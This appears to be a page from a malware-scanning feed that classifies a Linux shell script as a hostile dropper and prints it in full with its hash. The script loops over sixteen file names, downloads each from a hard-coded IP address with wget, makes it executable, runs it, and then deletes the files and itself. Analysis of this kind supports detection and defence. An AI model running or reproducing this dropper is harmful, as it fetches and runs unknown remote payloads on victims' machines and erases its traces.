Hostile 100% linux Download

WSW0

Dropper downloads and executes remote payloads

Self-deleting external-IP loop dropperExternal-IP loop download chmod and execute
SHA-256420dc609a9852388f9bf158e1fb7aa73032fbd7090e8217df1af504d613af30c

Evidence

External-IP loop download chmod and execute lines 1–18
1#!/bin/sh
2n="UHWS ESDM HAKO ZTLD MQUD XVTW CVLF ZIKC IFRZ GJYB ZHIT NLYU BFTR LJOY VYXJ STZW"
3if [ $# -gt 0 ]; then
4 n=$@
5fi
6cd /tmp
7for a in $n
8do
9 rm $a
10 wget http://216.107.139.197/$a
11 chmod +x $a
12 ./$a
13done
14for a in $n
15do
16 rm -rf $a
17done
18rm $0

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.